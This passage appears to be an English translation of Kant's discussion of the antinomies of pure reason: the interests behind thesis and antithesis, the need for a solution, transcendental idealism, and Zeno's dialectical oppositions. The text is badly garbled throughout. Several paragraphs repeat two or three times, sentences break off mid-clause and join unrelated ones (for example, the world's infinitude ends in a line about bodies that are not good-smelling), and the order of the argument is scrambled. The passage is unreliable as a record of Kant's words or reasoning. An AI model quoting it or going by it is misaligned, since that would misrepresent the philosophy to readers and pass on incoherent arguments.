Whether the world has a beginning [in time] and any limit to its extension in space; whether there is anywhere, and perhaps in my thinking self, an indivisible and indestructible unity, or nothing but what is divisible and transitory; whether I am free in my actions or, like other beings, am led by the hand of nature and of fate; whether finally there is a supreme cause of the world, or whether the things of nature and their order must as the ultimate object terminate thought — an object that even in our speculations can never be transcended: these are questions for the solution of which the mathematician would gladly exchange the whole of his science. For mathematics can yield no satisfaction in regard to those highest ends that most closely concern humanity. And yet the very dignity of mathematics (that pride of human reason) rests upon this, that it guides reason to knowledge of nature in its order and regularity — alike in what is great in it and in what is small — and in the extraordinary unity of its moving forces, thus rising to a degree of insight far beyond what any philosophy based on ordinary experience would lead us to expect; and so gives occasion and encouragement to an employment of reason that is extended beyond all experience, and at the same time supplies it with the most excellent materials for supporting its investigations — so far as the character of these permits — by appropriate intuitions.

Unfortunately for speculation, though fortunately perhaps for the practical interests of humanity, reason, in the midst of its highest expectations, finds itself so compromised by the conflict of opposing arguments, that neither its honour nor its security allows it to withdraw and treat the quarrel with indifference as a mere mock fight; and still less is it in a position to command peace, being itself directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis we observe a perfect uniformity in manner of thinking and complete unity of maxims, namely a principle of pure empiricism, applied not only in explanation of the appearances within the world, but also in the solution of the transcendental ideas of the world itself, in its totality. The assertions of the thesis, on the other hand, pre-suppose, in addition to the empirical mode of explanation employed within the series of appearances, intelligible beginnings; and to this extent its maxim is complex. But as its essential and distinguishing characteristic is the presupposition of intelligible beginnings, I shall entitle it the dogmatism of pure reason.

In the determination of the cosmological ideas, we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. On the contrary, pure empiricism appears to deprive them of all power and influence. If there is no primordial being distinct from the world, if the world is without beginning and therefore without an Author, if our will is not free, and the soul is divisible and perishable like matter, moral ideas and principles lose all validity, and share in the fate of the transcendental ideas which served as their theoretical support.

But secondly, in compensation, empiricism yields advantages to the speculative interest of reason, which are very attractive and far surpass those which dogmatic teaching bearing on the ideas of reason can offer. According to the principle of empiricism the understanding is always on its own proper ground, namely, the field of genuinely possible experiences, investigating their laws, and by means of these laws affording indefinite extension to the sure and comprehensible knowledge which it supplies. Here every object, both in itself and in its relations, can and ought to be represented in intuition, or at least in concepts for which the corresponding images can be clearly and distinctly provided in given similar intuitions. There is no necessity to leave the chain of the natural order and to resort to ideas, the objects of which are not known, because, as mere thought-entities, they can never be given. Indeed, the understanding is not permitted to leave its proper business, and under the pretence of having brought it to completion to pass over into the sphere of idealising reason and of transcendent concepts — a sphere in which it is no longer necessary for it to observe and investigate in accordance with the laws of nature, the causality of the cause will always itself be something that happens, making necessary a regress to a still higher cause, and thus a continuation of the series of conditions a parte priori without end. Nature, as working always through efficient causes, is thus too large for any of the concepts which we can employ in the synthesis of cosmical events.

If, in certain cases, we admit the occurrence of self-caused events, that is, generation through freedom, then by an unavoidable law of nature the question 'why' still pursues us, constraining us, in accordance with the law of causality which governs experience, to pass beyond such events; and we thus find that such totality of connection is too small for our necessary empirical concept.

Fourthly, if we admit an absolutely necessary being (whether it be the world itself, or something in the world, or the cause of the world), we set it in a time infinitely remote from any given point of time, because otherwise it would be dependent upon another and antecedent being. But such an existence is then too large for our empirical concept, and is unapproachable through any regress, however far this be carried.

If, again, we hold that everything belonging to the world (whether as conditioned or as condition) is contingent, any and every given existence is too small for our concept.

Secondly, if every appearance in space (matter) consists of infinitely many parts, the regress in the division will always be too large for our concept; while if the division of space is to stop at any member of the division (the simple), the regress will be too small for the idea of the unconditioned beginning of all synthesis. Being more accustomed to descend to consequences than to ascend to grounds, it does not puzzle over the possibility of the absolutely first; on the contrary, it finds comfort in such concepts, and at the same time a fixed point to which the thread by which it guides its movements can be attached. In the restless ascent from the conditioned to the condition, always with one foot in the air, there can be no satisfaction.

In the determination of the cosmological ideas, we find on the side of dogmatism, that is, of the thesis: First, a certain practical interest in which every right-thinking man, if he has understanding of what truly concerns him, heartily shares. That the world has a beginning, that my thinking self is of simple and therefore indestructible nature, that it is free in its voluntary actions and raised above the compulsion of nature, and finally that all order in the things constituting the world is due to a primordial being, from which everything derives its unity and purposive connection — these are so many foundation stones of morals and religion. The antithesis robs us of all these supports, or at least appears to do so.

Secondly, reason has a speculative interest on the side of the thesis. When the transcendental ideas are postulated and employed in the manner prescribed by the thesis, the entire chain of conditions and the derivation of the conditioned can be grasped completely a priori. For we then start from the unconditioned. This is not done by the antithesis, which for this reason is at a very serious disadvantage. To the question as to the conditions of its synthesis it can give no answer which does not lead to the endless renewal of the same enquiry.

According to the antithesis, every given beginning compels us to advance to one still higher; every part leads to a still smaller part; every event is preceded by another event as its cause; and the conditions of existence in general rest always again upon other conditions, without ever obtaining unconditioned footing and support in any self-subsistent things, that is, treats mere representations, only in such a possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis can do no more than merely approximate; the question must therefore be capable of being solved entirely from the idea.

Since the idea is a mere creature of reason, reason cannot disclaim its responsibility and saddle it upon the unknown object.

It is not so extraordinary as at first seems the case, that a science should be in a position to demand and expect none but assured answers to all the questions within its domain (quaestiones domesticae), although up to the present they have perhaps not been found. In addition to transcendental philosophy there is any question relating to an object presented to pure reason which is unanswerable by this reason, and whether we may rightly excuse ourselves from giving a decisive answer. In thus excusing ourselves, we should have to show that any knowledge which we can acquire still leaves us in complete uncertainty as to what should be ascribed to the object, and that while we do indeed have a concept sufficient to raise a question, we are entirely lacking in materials or power to answer the same.

Now I maintain that transcendental philosophy is unique in the whole field of speculative knowledge, in that no question which concerns an object given to pure reason can be insoluble for this same human reason, and that no excuse of an unavoidable ignorance, or of the problem's unfathomable depth, can release us from the obligation to answer it thoroughly and completely. That very concept which puts us in a position to ask the question must also qualify us to answer it, since, as in the case of right and wrong, the object is not to be met with outside our idea, it is not possible for it to be given. The cause of failure we must seek in our idea itself. For so long as we obstinately persist in assuming that there is an actual object corresponding to the idea, the problem, as thus viewed, allows of no solution. A clear exposition of the dialectic which lies within our concept itself would soon yield us complete certainty how we ought to judge in reference to such a question.

The pretext that we are unable to obtain certainty in regard to these problems can be at once met with the following question which certainly calls for a clear answer: Whence come those ideas, the solution of which involves us in such difficulty? Is it, perchance, appearances that demand explanation, and do we, in accordance with these ideas, have to seek only the principles or rules of their exposition? Even if we suppose the whole of nature to be spread out before us, and that of all that is presented to our intuition nothing is concealed from our senses and consciousness, yet still through no experience could the object of our ideas be known by us in concreto. For that purpose, in addition to this exhaustive intuition, we should require what is not possible through any empirical knowledge, namely, a completed synthesis and the consciousness of its absolute totality. Accordingly our question does not require to be raised in the explanation of any given appearance, and is therefore not a question which can be regarded as imposed on us by the object itself. The object can never come before us, since it cannot be given in any experience, being no longer empirical. Since we are here dealing solely with a thing as object of a possible experience, not as a thing in itself, nor as being in its magnitude either infinite or finite. I beg permission to entitle this kind of opposition dialectical, and that of contradictories analytical. Thus of two dialectically opposed judgments both may be false; for the one is not a mere contradictory of the other, but says something more than is required for a simple contradiction.

If we regard the two propositions, that the world is infinite in magnitude and that it is finite in magnitude, as contradictory opposites, we are assuming that the world, the complete series of the conditions, and therefore the unconditioned, is given therewith, or rather is presupposed in view of the fact that the conditioned, which is only possible through the complete series, is given. The synthesis of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, to regard appearances both as things in themselves and as objects given to the pure understanding, than to proceed as we have done in the major, in which we have [similarly] abstracted from all those conditions of intuition under which alone objects can be given. Yet in so doing we have overlooked an important distinction between the concepts. The synthesis of the conditioned with its condition; they are presupposed as given together with it. Further, it is no less natural, in the minor premise, to regard appearances both as things in themselves and as objects given to the pure understanding, than to proceed as we have done in the major, in which we have [similarly] abstracted from all those conditions of intuition under which alone objects can be given. Yet in so doing we have overlooked an important distinction between the concepts. The synthesis of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations appearances cannot be given save in so far as I attain knowledge of them, or rather attain them in themselves, for they are nothing but empirical modes of knowledge — I cannot say, in the same sense of the terms, that if the conditioned is given, all its conditions (as appearances) are likewise given, and therefore cannot in any way infer the absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned is given, the entire series of all its conditions is likewise given; objects of the senses are given as conditioned; therefore, etc. Through this syllogism, the major premise of which appears so natural and evident, as many cosmological ideas are introduced as there are differences in the conditions (in the synthesis of appearances, it must either be too large or too small for any concept of the understanding applied to mere appearances. The argument thus commits that dialectical fallacy which is entitled sophisma figurae dictionis. This fallacy is not, however, an artificial one; a quite natural illusion of our common reason leads us, when anything is given as conditioned, thus to assume in the major premise, as it were without thought or question, its conditions and their series. This assumption is indeed simply the logical requirement that we should have adequate premises for any given conclusion. Also, there is no reference to a time-order in the connection of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations as things in themselves.

It would be unjust to ascribe to us that long-decried empirical idealism, which, while it admits the genuine reality of space, denies the existence of the extended beings in it, or at least considers their existence doubtful, and so does not in this regard allow of any properly demonstrable distinction between the concepts. The synthesis of the conditioned with its condition is here a synthesis of the mere understanding, which represents things as they are, without considering whether and how we can obtain knowledge of them. If, however, what we are dealing with are appearances — as mere representations, which as perceptions can mark out a real object only in so far as the perception connects with all others according to the rules of the unity of experience. Thus we can say that the real things of past time are given in the transcendental doctrine of the soul are answerable in this latter manner, and have indeed been so answered; its questions refer to the transcendental subject — but only an appearance that has been given to the sensibility of this, to us unknown, being.

This inner appearance cannot be admitted to exist in any such manner in and by itself; for it is conditioned by time, and time cannot be a determination of a thing in itself. The empirical truth of appearances in space and time is, however, sufficiently secured; it is adequately distinguished from dreams, if both dreams and genuine appearances cohere truly and completely in one experience, in accordance with empirical laws, in a word, that the course of the world, conducts us to a past time-series as condition of the present time — a series which, however, can be represented as actual not in itself but only in the connection of a possible experience, not as a thing in itself, the answer to the transcendent cosmological question cannot lie anywhere save in the idea. We are not asking what is the constitution of any object in itself, nor as regards possible experience are we enquiring what can be given in concreto in any experience. Our sole question is as to what lies in the idea, to which the empirical synthesis can do no more than merely approximate; the question must therefore be capable of being solved entirely from the idea.

Since the idea is a mere creature of reason, reason cannot disclaim its responsibility and saddle it upon the unknown object.

It is not so extraordinary as at first seems the case, that a science should be in a position to demand and expect none but assured answers to all the questions within its domain (quaestiones domesticae), although up to the present they have perhaps not been found. In addition to transcendental philosophy, they have been divested of all empirical features, although only in connection therewith can their full splendour be displayed. But in this empirical application, and in the progressive extension of the employment of reason, philosophy, beginning with the field of our experiences and steadily soaring to these lofty ideas, displays a dignity and worth such that, could it but make good its pretensions, it would leave all other human science far behind. For it promises a secure foundation for our highest expectations in respect of those ultimate ends towards which all the endeavours of reason must ultimately converge.

Whether the world has a beginning, it will then, in the necessary empirical regress, be too small for the concept of the understanding, it must be entirely empty and without meaning; for its object, view it as we may, cannot be made to agree with it. This is in fact the case with all cosmical concepts; and this is why reason, so long as it holds to them, is involved in an unavoidable antinomy. For suppose: —

First, that the world has no beginning: it is then too large for our concept; while if the division of space is to stop at any member of the division (the simple), the regress will be too small for the idea of the unconditioned. For this member always still allows of a regress to further parts contained in it.

Thirdly, if we suppose that nothing happens in the world save in accordance with empirical laws, in a word, that the course of the world, conducts us to a past time-series as condition of the present time — a series which, however, can be represented as actual not in itself but only in the connection of a possible experience. Accordingly, all events which have taken place in the immense periods that have preceded my own existence mean really nothing but the possibility of extending the chain of experience from the present perception back to the conditions which determine this perception in respect of time.

If, therefore, I represent to myself all existing objects of the senses in all time and in all places, I do not set them in space and time [as being there] prior to experience. This representation is nothing but the thought of a possible experience. Accordingly, all events which have taken place in the immense periods that have preceded my own existence mean really nothing but the possibility of extending the chain of experience from the present perception back to the conditions which determine this perception in respect of time.

If, therefore, I represent to myself all existing objects of the senses in all time and in all places, I do not set them in space and time [as being there] prior to experience. This representation is nothing but the thought of a possible experience are they given. To say that they exist prior to all my experience is only to assert that they are to be met with if, starting from perception, I advance to that part of experience to which they belong. The cause of the empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis of appearances) that constitute a series. The ideas postulate absolute totality of these series; and thereby they set reason in unavoidable conflict with itself. We shall be in a better position to detect what is deceptive in this pseudo-rational argument, if we first correct and define some of the concepts employed in it.

In the first place, it is evident beyond all possibility of doubt, that if the conditioned, in the [field of] appearance, is given, the synthesis which constitutes its empirical condition is given therewith and is presupposed. This synthesis first occurs in the regress, and never exists without it. What we can say is that a regress to the conditions, that is, a continued empirical synthesis, on the side of the conditions, it must remain uncertain what exact relation, in rational or irrational numbers, a diameter bears to a circle? Since no adequate solution in terms of rational numbers is possible, and no solution in terms of irrational numbers has yet been discovered, it was concluded that at least the impossibility of a solution can be known with certainty, and of this impossibility Lambert has given the required proof. In the universal principles of morals nothing can be uncertain, because the principles are either altogether void and meaningless, or must be derived from the concepts of our reason. In natural science, on the other hand, there is endless conjecture, and certainty is not to be counted upon. For the natural appearances are objects which are given to us independently of our concepts, and the key to them lies not in us and our pure thinking, but outside us; and therefore in many cases, since the key is not to be found, an assured solution is not to be expected. I am not, of course, here referring to those questions of the Transcendental Analytic which concern the deduction of our pure knowledge; we are at present treating only of the certainty of judgments with respect to their objects and not with respect to the source of our concepts themselves.

The obligation of an at least critical solution of the questions which reason thus propounds to itself, we cannot, therefore, escape by complaints of the narrow limits of our reason, and by confessing, under the pretext of a humility based on self-knowledge, that it is beyond the power of our reason to determine whether the world exists from eternity or has a beginning; whether cosmical space is filled with beings to infinitude, or is enclosed within certain limits; whether anything in the world is simple, or everything such as to be infinitely divisible; whether there is generation and production through freedom, or whether everything depends on the chain of events in the natural order; and finally whether there exists any being completely unconditioned and necessary in itself, or whether everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality of the synthesis of appearances. If from our own concepts we are unable to assert and determine anything certain, we must not throw the blame upon the object as concealing itself from us. Since such an object is nowhere to be met with outside our idea, it is not possible for it to be given. The cause of failure we must seek in our idea itself. For so long as we obstinately persist in assuming that there is an actual object corresponding to the idea, the problem, as thus viewed, allows of no solution. A clear exposition of the dialectic which lies within our concept itself would soon yield us complete certainty how we ought to judge in reference to such a question.

The pretext that we are unable to obtain certainty in regard to these problems can be at once met with the following question which certainly calls for a clear answer: Whence come those ideas, the solution of which the mathematician would gladly exchange the whole of his science. For mathematics can yield no satisfaction in regard to those highest ends that most closely concern humanity. And yet the very dignity of mathematics (that pride of human reason) rests upon this, that it guides reason to knowledge of nature in its order and regularity — alike in what is great in it and in what is small — and in the extraordinary unity of its moving forces, thus rising to a degree of insight far beyond what any philosophy based on ordinary experience would lead us to expect; and so gives occasion and encouragement to an employment of reason that is extended beyond all experience, and at the same time supplies it with the most excellent materials for supporting its investigations — so far as the character of these permits — by appropriate intuitions.

Unfortunately for speculation, though fortunately perhaps for the practical interests of reason.

The contrast between the teaching of Epicurus and that of Plato is of this nature.

Each of the two types of philosophy says more than it knows. The former encourages and furthers knowledge, though to the prejudice of the practical; the latter supplies excellent practical principles, but it permits reason to indulge in ideal explanations of natural appearances, in regard to which a speculative knowledge is alone possible to us — to the neglect of physical investigation.

Finally, as regards the third factor which has to be considered in a preliminary choice between the two conflicting parties, it is extremely surprising that empiricism should be so universally unpopular. The common understanding, it might be supposed, would eagerly adopt a programme which promises to satisfy it through exclusively empirical knowledge and the rational connections there revealed — in preference to the transcendental dogmatism which compels it to rise to concepts far outstripping the insight and rational faculties of the most practised thinkers. But this is precisely what commends such dogmatism to the common understanding. For it then finds itself in a position in which the most learned can claim no advantage over it. If it understands little or nothing about these matters, no one can boast of understanding much more; and though in regard to them it cannot express itself in so scholastically correct a manner as those with special training, nevertheless there is no end to the plausible arguments which it can propound, wandering as it does amidst mere ideas, about which no one knows anything, and in regard to which it is therefore free to be as eloquent as it pleases; whereas when matters that involve the investigation of nature are in question, it has to stand silent and to admit its ignorance. Thus indolence and vanity combine in sturdy support of these principles. Besides, although the philosopher finds it extremely hard to accept a principle for which he can give no justification, still more to employ concepts the objective reality of which he is unable to establish, nothing is more usual in the case of the common understanding, indeed, all speculative interests pale before the practical; and it imagines that it comprehends and knows what its fears or hopes incite it to assume or to believe.

Thus empiricism is entirely devoid of the popularity of transcendentally idealising reason; and however prejudicial such empiricism may be to the highest practical principles, there is no need to fear that it will ever pass the limits of the Schools, and acquire any considerable influence in the general life or any real favour among the multitude.

Human reason is by nature architectonic. That is to say, it regards all our knowledge as belonging to a possible system, and therefore allows only such principles as do not at any rate make it impossible for any knowledge that we may attain to combine into a system with other knowledge. But the propositions of the antithesis are of such a kind that they render the completion of the edifice of knowledge quite impossible. They maintain that there is always to be found beyond every state of the world a more ancient state, in every part yet other parts similarly divisible, prior to every event still another event which itself again is likewise generated, and that in existence in general everything is conditioned in its existence and therefore dependent on external things and itself contingent. All these questions refer to an object which can be found nowhere save in our thoughts, namely, to the absolutely unconditioned totality that which according to the rules of experience can never be determined save as conditioned.

These pseudo-rational assertions are so many attempts to solve four natural and unavoidable problems of reason. There are just so many, neither more nor fewer, owing to the fact that there are just four series of synthetic presuppositions which impose a priori limitations on the empirical synthesis.

The proud pretensions of reason, when it strives to extend its domain beyond all limits of experience, we have represented only in dry formulas that contain merely the ground of their legal claims. As befits a transcendental philosophy, they have been divested of all empirical features, although only in connection therewith can their full splendour be displayed. But in this empirical application, and in the progressive extension of the employment of reason, philosophy, beginning with the field of our experiences and steadily soaring to these lofty ideas, displays a dignity and worth such that, could it but make good its pretensions, it would leave all other human science far behind. For it promises a secure foundation for our highest expectations in respect of those ultimate ends towards which all the endeavours of reason must ultimately converge.

Whether the world has a beginning [in time] and any limit to its extension in space; whether there is anywhere, and perhaps in my thinking self, an indivisible and indestructible unity, or nothing but what is divisible and transitory; whether I am free in my actions or, like other beings, am led by the hand of nature and of fate; whether finally there is a supreme cause of the world, or whether the things of nature and their order must as the ultimate object terminate thought — an object that even in our speculations can never be transcended: these are questions for the solution of which the mathematician would gladly exchange the whole of his science. For mathematics can yield no satisfaction in regard to those highest ends that most closely concern humanity. And yet the very dignity of mathematics (that pride of human reason) rests upon this, that it guides reason to knowledge of nature in its order and regularity — alike in what is great in it and in what is small — and in the extraordinary unity of its moving forces, thus rising to a degree of insight far beyond what any philosophy based on ordinary experience would lead us to expect; and so gives occasion and encouragement to an employment of reason that is extended beyond all experience, and at the same time supplies it with the most excellent materials for supporting its investigations — so far as the character of these permits — by appropriate intuitions.

Unfortunately for speculation, though fortunately perhaps for the practical interests of humanity, reason, in the midst of its highest expectations, finds itself so compromised by the conflict of opposing arguments, that neither its honour nor its security allows it to withdraw and treat the quarrel with indifference as a mere mock fight; and still less is it in a position to command peace, being itself directly interested in the matters in dispute. Accordingly, nothing remains for reason save to consider whether the origin of this conflict, whereby it is divided against itself, may not have arisen from a mere misunderstanding. In such an enquiry both parties, per chance, may have to sacrifice proud claims; but a lasting and peaceful reign of reason over understanding and the senses would thereby be inaugurated.

For the present we shall defer this thorough enquiry, in order first of all to consider upon which side we should prefer to fight, should we be compelled to make choice between the opposing parties. The raising of this question, how we should proceed if we consulted only our interest and not the logical criterion of truth, will decide nothing in regard to the contested rights of the two parties, but has this advantage, that it enables us to comprehend why the participants in this quarrel, though not influenced by any superior insight into the matter under dispute, have preferred to fight on one side rather than on the other. It will also cast light on a number of incidental points, for instance, the passionate zeal of the one party and the calm assurance of the other; and will explain why the world hails the one with eager approval, and is implacably prejudiced against the other.

Comparison of the principles which form the starting-points of the two parties is what enables us, as we shall find, to determine the standpoint from which alone this preliminary enquiry can be carried out with the required thoroughness. In the assertions of the antithesis are of such a kind that they render the completion of the edifice of knowledge quite impossible. They maintain that there is always to be found beyond every state of the world a more ancient state, in every part yet other parts similarly divisible, prior to every event still another event which itself again is likewise generated, and that in existence in general everything is conditioned, an unconditioned and first existence being nowhere discernible. Since, therefore, the antithesis thus refuses to admit as first or as a beginning anything that could serve as a foundation for building, a complete edifice of knowledge is, on such assumptions, altogether impossible. Thus the architectonic interest of reason — the demand not for empirical but for pure a priori unity of reason — forms a natural recommendation for the assertions of the thesis.

If men could free themselves from all such interests, and consider the assertions of reason irrespective of their consequences, solely in view of the intrinsic force of their grounds, and were the only way of escape from their perplexities to give adhesion to one or other of the opposing parties, their state would be one of continuous vacillation. To-day it would be their conviction that the human will is free; tomorrow, dwelling in reflection upon the indissoluble chain of nature, they would hold that freedom is nothing but self-deception, that everything is simply nature. If, however, they were summoned to action, this play of the merely speculative reason would, like a dream, at once cease, and they would choose their principles exclusively in accordance with practical interests. Since, however, it is fitting that a reflective and enquiring being should devote a certain amount of time to the examination of his own reason, entirely divesting himself of all partiality and openly submitting his observations to the judgment of others, no one can be blamed for, much less prohibited from, presenting for trial the two opposing parties, leaving them, terrorised by no threats, to defend themselves as best they can, before a jury of like standing with themselves, that is, before a jury of fallible men.
§ 4
THE ABSOLUTE NECESSITY OF A SOLUTION OF THE TRANSCENDENTAL PROBLEMS OF PURE REASON

To profess to solve all problems and to answer all questions would be impudent boasting, and would argue such extravagant self-conceit as at once to forfeit all confidence. Nevertheless there are sciences the very nature of which requires that every question arising within their domain should be completely answerable in terms of what is known, inasmuch as the answer must issue from the same sources from which the question proceeds. In these sciences it is not permissible to plead unavoidable ignorance; the solution can be demanded.

We must be able, in every possible case, in accordance with empirical laws.

The objects of experience, then, are never given in themselves, but only in experience, and have no existence outside it. That there may be inhabitants in the moon, although no one has ever perceived them, must certainly be admitted. This, however, only means that in the possible advance of experience we must meet with such a perception, or it means nothing at all. For if we were speaking of a thing in itself, we could indeed say that it exists in itself apart from relation to our senses and possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves but only of our sensibility. Accordingly, that which is in space and time is an appearance; it is not anything in itself but consists merely of representations, which, in the manner in which they are represented, as extended beings, or as series of alterations, have no independent existence outside our thoughts. This doctrine I entitle transcendental idealism. [I have also, elsewhere, sometimes entitled it formal idealism, to distinguish it from material idealism, that is, from the usual type of idealism which doubts or denies the existence of outer things themselves.] The realist, in the transcendental meaning of this term, treats these modifications of our sensibility as self-subsistent things, that is, treats mere representations as things in themselves.

It would be unjust to ascribe to us that long-decried empirical idealism, which, while it admits the genuine reality of space, denies the existence of the extended beings in it as real; and the same is true of time. But this space and this time, and with them all appearances, are not in themselves things; they are nothing but representations, and cannot exist outside our mind. Even the inner and sensible intuition of our mind (as object of consciousness) which is represented as being determined by the succession of different states in time, is not the self proper, as it exists in itself — that is, is not the transcendental subject — but only an appearance that has been given to the sensibility of this, to us unknown, being.

This inner appearance cannot be admitted to exist in any such manner in and by itself; for it is conditioned by time, and time cannot be a determination of a thing in itself. The empirical truth of appearances in space and time is, however, sufficiently secured; it is adequately distinguished from dreams, if both dreams and genuine appearances cohere truly and completely in one experience, in accordance with empirical laws.

The objects of experience, then, are never given in themselves, but only in this experience, being mere representations, which as perceptions can mark out a real object only in so far as the perception connects with all others according to the rules of the unity of experience. Thus we can say that the real things of past time are given in the transcendental object of experience; but they are objects for me and real in past time only in so far as I represent to myself (either by the light of history or by the guiding-clues of causes and effects) that a regressive series of possible perceptions in accordance with empirical laws, in a word, that the course of the world, conducts us to a past time-series as condition of the present time — a series which, however, can be represented as actual not in itself but only in the connection of a possible experience. But we are here speaking only of an appearance in space and time, which are not determinations of things in themselves and as objects given to the pure understanding, than to proceed as we have done in the major, in which we have [similarly] abstracted from all those conditions of intuition under which alone objects can be given. Yet in so doing we have overlooked an important distinction between the concepts. The synthesis of the conditioned with its conditions (and the whole series of the latter) does not in the major premise carry with it any limitation through time or any concept of succession. The empirical synthesis, on the other hand, that is, the series of the conditions in appearance, as subsumed in the minor premise, is necessarily successive, the members of the series being given only as following upon one another in time; and I have therefore, in this case, no right to assume the absolute totality of the synthesis and of the series thereby represented. In the major premise all the members of the series are given in themselves, without any condition of time, but in this minor premise they are possible only through the successive regress, which is given only in the process in which it is actually carried out.

When this error has thus been shown to be involved in the argument upon which both parties alike base their cosmological assertions, both might justly be dismissed, as being unable to offer any sufficient title in support of their claims.

But the quarrel is not thereby ended — as if one or both of the parties had been proved to be wrong in the actual doctrines they assert, that is, in the conclusions of their arguments. For although they have failed to support their contentions by valid grounds of proof, nothing seems to be clearer than that since one of them asserts that the world has a beginning and the other that it has no beginning and is from eternity, one of the two must be in the right. But even if this be so, none the less, since the arguments on both sides are equally clear, it is impossible to decide between them. The parties may be commanded to keep the peace before the tribunal of reason; but the controversy none the less continues. There can therefore be no way of settling it once for all and to the satisfaction of both sides, save by their becoming convinced that the very fact of their being able so admirably to refute one another is evidence that they are really quarrelling about nothing, and that a certain transcendental illusion has mocked them with a reality where none is to be found. This is the path which we shall now proceed to follow in the settlement of a dispute that defies all attempts to come to a decision.
* * *

Zeno of Elea, a subtle dialectician, was severely reprimanded by Plato as a mischievous Sophist who, to show his skill, would set out to prove a proposition through convincing arguments and then immediately overthrow them by other arguments equally strong. Zeno maintained, for example, that God (probably conceived by him as simply the world) is neither finite nor infinite, neither in motion nor at rest, neither similar nor dissimilar to any other thing. To the critics of his procedure he appeared to have the absurd intention of denying both of two mutually contradictory propositions. But this accusation does not seem to me to be justified. The first of his propositions I shall consider presently more in detail. As regards the others, if by the word 'God' he meant the universe, he would certainly have to say that it is neither abidingly present in its place, that is, at rest, nor that it changes its place, that is, is in motion; because all places are in the universe, and the universe is not, therefore, itself in any place. Again, if the universe comprehends in itself everything that exists, it cannot be either similar or dissimilar to any other thing, because there is no other thing, nothing outside it, with which it could be compared. If two opposed judgments presuppose an inadmissible condition, then in spite of their opposition, which does not amount to a contradiction strictly so-called, both fall to the ground, inasmuch as the condition, under which alone either of them can be maintained, itself falls.

If it be said that all bodies have either a good smell or a smell that is not good, a third case is possible, namely, that a body has no smell at all; and both the conflicting propositions may therefore be false. If, however, I say: all bodies are either good-smelling or not good-smelling (vel suaveolens vel non suaveolens), the two judgments are directly contradictory to one another, and the former only is false, its contradictory opposite, namely, that some bodies are not good-smelling, comprehending those bodies also which have no smell at all.

Since, in the previous opposition (per disparata), smell, the contingent condition of the concept of the body, was not removed by the opposed judgment, but remained attached to it, the two judgments were not related as contradictory opposites.

If, therefore, we say that the world is either infinite in extension or is not infinite (non est infinitus), and if the former proposition is false, its contradictory opposite, namely, that some bodies are not good-smelling, comprehending those bodies also which have no smell at all.

Since, in the previous opposition (per disparata), smell, the contingent condition of the concept of the body, was not removed by the opposed judgment, but remained attached to it, the two judgments were not related as contradictory opposites.

If, therefore, we say that the world is either infinite or finite (non-infinite), both statements might be false. For in that case we should be regarding the world in itself as determined in its magnitude, and in the opposed judgment we do not merely remove the infinitude, and with it perhaps the entire separate existence of the world, but attach a determination to the world, regarded as a thing actually existing in itself. This assertion may, however, likewise be false; the world may not be given as a thing in itself, nor as being in its magnitude either infinite or finite. I beg permission to entitle this kind of opposition dialectical, and that of contradictories analytical. Thus of two dialectically opposed judgments both may be false; for the one is not a mere contradictory of the other, but says something more than is required for a simple contradiction.

